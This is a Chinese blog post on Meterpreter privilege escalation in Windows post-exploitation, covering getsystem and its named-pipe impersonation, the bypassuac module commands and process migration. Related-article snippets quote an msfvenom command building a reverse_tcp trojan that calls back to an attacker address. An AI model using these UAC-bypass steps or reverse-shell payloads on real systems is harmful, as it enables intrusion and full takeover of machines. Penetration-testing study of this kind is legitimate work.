12.1、后渗透测试--提权

最新推荐文章于 2024-04-22 20:44:41 发布
最新推荐文章于 2024-04-22 20:44:41 发布
阅读量745 收藏 3
点赞数 1
分类专栏: 安全 文章标签: metasploit 提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/leiwuhen92/article/details/128303486
版权

meterpreter提权方式:

  1. getsystem自动提权
  2. bypassuac提权
  3. migrate

1、getsystem自动提权

meterpreter > getsystem
getsystem工作原理:
  1. getsystem创建一个新的Windows服务,设置为SYSTEM运行,当它启动时连接到一个命名管道。
  2. getsystem产生一个进程,它创建一个命名管道并等待来自该服务的连接。
  3. Windows服务已启动,导致与命名管道建立连接。
  4. 该进程接收连接并调用ImpersonateNamedPipeClient,从而为SYSTEM用户创建模拟令牌。然后用新收集的SYSTEM模拟令牌产生cmd.exe,并且我们有一个SYSTEM特权进程。

2、bypassuac提权

use exploit/windows/local/bypassuac
set session 1
run
返回了一个新的meterpreter,再次输入getsystem,成功绕过uac,得到系统权限:

3、migrate

我们回到session 1尝试进行reboot操作但是无果
输入ps查看当前的进程:
找到:
输入指令migrate 1252来提升权限:
当前权限程度可以进行重启:
但无法进行新建账号。

参考:

青霄
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
meterpreter提权小结
MercyLin的博客
09-05 3029
经过一波操作我们成功进入meterperter,接下来主要就如何在meterpreter进行提权 首先我们可以输入getuid来查看当前用户的权限~ 可以看到我们貌似可能是管理员权限,到底是不是还有待验证,我们的最终目的是将其提升到system权限. getsystem自动提权 输入getsystem来尝试提权,MSF会自动选择合适的方式来提升当前权限 这个就比较玄学,我还没成功过,可以看到g...
渗透测试-内网信息收集
cdyunaq的博客
04-28 3271
1 收集本机信息 1.1 手动收集信息 查询网络配置信息 ipconfig /all 查询操作系统和版本信息 systeminfo | findstr /B /C:"OS Name" /C:"OS Version" systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本" 查询系统体系结构 echo %PROCESSOR_ARCHITECTURE% 查看安装的软件及版本、路径等 wmic product get name,version 利用PowerS
Meterpreter提权详解
weixin_30755393的博客
08-16 756
0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe这里我们为生成的木马指定了payload为: win...
Meterpreter 提权
eli的博客
05-20 2234
0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe 这里我们为生成的木马指定了payload为: windows/meterpreter/reverse_tcp,反弹到的监听端地址为172.16.11.2,监听端口为44
利用meterperter进行win7系统提权
weixin_63137680的博客
10-30 1773
利用meterpreter对win7系统进行提权
【THM】Linux Privilege Escalation(权限提升)-初级渗透测试
最新发布
追风少年亚索的博客
04-22 482
撰写本文目的仅仅提供个人查看笔记用途,大家可以去官网查看,都一样的
靶机渗透测试实战(七)——FristiLeaks渗透实战
橘子女侠
05-11 3926
目录 一. 实验环境 二. 实验流程 三. 实验步骤 (一)信息收集——主机发现 1. 查看Kali的IP信息;(IP:192.168.37.131) 2. 查看靶机页面,IP地址为:192.168.37.146; 3. 扫描主机(netdiscover) (二)信息收集——端口扫描 1. 扫描端口(masscan) 2. 详细扫描端口信息(nmap) (三)渗透测试 80...
渗透测试之中间件安全
Blood_Pupil的博客
05-21 4265
IIS 版本 漏洞 可利用度 利用场景 6.0 Put漏洞 (默认状态?) Webshell上传 1.0-10.0(全版本) 短文件名猜解 低 敏感文件下载,猜后台,猜敏感文件 6.0 远程代码执行(ms-16-016) 高 提权 PUT漏洞 短文件名猜解漏洞 漏洞形成原因 此漏洞实际是由HTTP请求中旧DOS 8.3名称约定(SFN)的代字符(〜)波浪号引起的。 利...
模糊测试--强制性安全漏洞发掘
热门推荐
软件性能测试专栏
01-20 2万+
文档分享地址链接:http://pan.baidu.com/share/link?shareid=2723797392&uk=2485812037 密码:r43x 前 言 我知道"人类和鱼类能够和平共处" 。 --George W. Bush, 2000年9月29日 简介 模糊测试的概念至少已经流传了20年,但是直到最近才引起广泛的关注。安全漏洞困扰了许多流行的客户端应用程序
meterpreter使用
weixin_30405421的博客
09-26 1500
0x01 系统命令 基本系统命令 1 background # 将当前会话放置后台 2 sessions # sessions –h 查看帮助 3 sessions -i <ID值> #进入会话 -k 杀死会话 4 bgrun / run # 执行已有的模块,输入run后按两下tab,列出已有的脚本 5 info # 查看已有...
2、(权限提升)进入Meterpreter后的攻击方式小结
daxi0ng的博客
03-15 1591
##使用getsystem提权失败的话,可以使用WMIC工具进行提权准备,使用提权模块进行提权,如MS16-032,本次进入的就是system权限。 令牌窃取 令牌简介及原理 令牌 (Token) 就是系统的临时密钥, 相当于账户名和密码, 用来决定是否允许这次请求和判断这次请求是属于哪一个用户的。 它允许你在不提供密码或其他凭证的前提下, 访问网络和系统资源。 这些令牌将持续存在于系统中, 除...
提权学习之旅——利用Metasploit提权
Lemon's blog
08-16 712
1
Metasploit提权和后渗透
Kali与编程
12-04 1547
后渗透技术包括提权、横向移动、持久化、数据窃取、漏洞利用等,攻击者可以利用这些技术和工具深入系统内部,并获取系统中的敏感信息、提高攻击者的权限、绕过防御措施等。在本文中,我将详细介绍Metasploit提权模块和技术,包括Windows和Linux系统下的提权模块和技术,以及如何使用Metasploit进行提权攻击。横向移动是指攻击者在入侵一个系统后,通过利用系统内部的漏洞或者获取其他用户的登录名和密码等方式,从一个系统进入另一个系统,进而攻击其他系统。
【内网安全】——meterpreter使用攻略
qq_53058639的博客
01-26 1044
Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。
supervisor nginx_Supervisor 的使用和进阶 (3)
weixin_39705018的博客
11-25 149
本文主要介绍 supervisor 对 fastcgi 进程的管理在php 中,php-fpm 有主进程来管理和维护子进程的数量。但是并不是所有的服务都有类似的主进程来做子进程的维护。在其他语言中,有很多比较有名的fastcgi 服务,例如py 的flup, c++ 实现的 FastCgi++等,如果这些服务在单机中启动多个进程(极有可能),那如何管理这些进程是个比较头疼的问题。supe...
白帽黑客之Metasploit
10-25
本套教程,我们将为大家详细讲解Metasploit的使用方法。Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。 
使用Metasploit在Android端进行渗透测试
weixin_64647213的博客
02-10 1516
记一次对于android的安全测试,细节更多,适合小白
ms17-010直接拿meterpreter权限
qq_38240166的博客
03-07 8326
小白,第一次写博客,轻喷写的不好请指出最近无聊就装了个msf玩玩ms17-010,只要你开了445端口,又没打补丁,那就很容易gg先开个msf进一下利用模块。然后简单的设置一下ip和payload。设置完开始攻击这样子就获得一个会话。输入shell看看发现乱码,调一下编码就行了。第一次玩msf,所以看了两天的书才搞懂这些...
cuda12.1对应的tensorflow-gpu
05-01
如果您要使用CUDA 12.1,您需要使用TensorFlow的开发版本,并将其从源代码编译安装。 以下是使用CUDA 12.1的TensorFlow构建指南: 1. 安装CUDA 12.1和cuDNN 8.0。请确保您的CUDA和cuDNN版本兼容。您可以从NVIDIA...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值